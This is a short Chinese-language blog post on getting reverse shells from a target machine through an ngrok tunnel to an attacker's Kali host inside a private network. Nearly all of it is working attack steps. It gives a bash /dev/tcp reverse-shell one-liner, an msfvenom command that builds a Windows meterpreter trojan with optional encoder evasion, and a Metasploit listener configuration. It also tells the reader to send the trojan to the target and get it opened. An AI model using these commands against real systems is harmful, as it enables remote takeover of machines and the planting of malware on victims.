通过内网穿透反弹shell

ngrok 的使用方法在我这篇博客的3.3小节记录过

https://www.cnblogs.com/wkzb/p/12358076.html#autoid-3-2-0

这篇文章的使用情景是攻击机在内网中,而靶机有公网ip(换句话说就是 kali 可以 ping 通靶机,靶机无法 ping 通 kali),kali 的 ip 是 192.168.25.129

 

一、bash一句话反弹shell

1.ngrok开通隧道

2.kali 打开 ngrok 客户端:./sunny clientid 隧道id

3.kali 监听端口:nc -lvp 12345

4.靶机执行命令:bash -i >& /dev/tcp/服务器地址/隧道端口 0>&1

5.kali 接收到靶机 bash

补充:

bash 一句话的拆分说明,来自 https://blog.csdn.net/nzjdsds/article/details/82935189

 

二、msf反弹shell

前两步同上,完成了端口映射就能将外网端口接收到的数据返回到本机 kali 的指定端口

3.msf生成一个payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器地址 LPORT=隧道端口 -f exe -o shell.exe

(还可以使用 -e 参数设置加密类型 -i 参数设置加密次数,例如 -e x86/shikata_ga_nai -i 12,具体参数我这篇博客 https://www.cnblogs.com/wkzb/p/12283352.html 有记录)

https://www.cnblogs.com/youyouii/p/10240551.html  这篇文章记录了 msf 常用 payload

4.使用 metasploit 进行监听

use exploit/multi/handler
set payloads windows/meterpreter/reverse_tcp
set lhost 192.168.25.129
set lport 12345
exploit

5.将生成的木马发送到靶机,打开木马

6.当靶机执行木马后,得到一个meterpreter

 

posted @ 2020-04-04 15:35  beiwo  阅读(672)  评论(0编辑  收藏  举报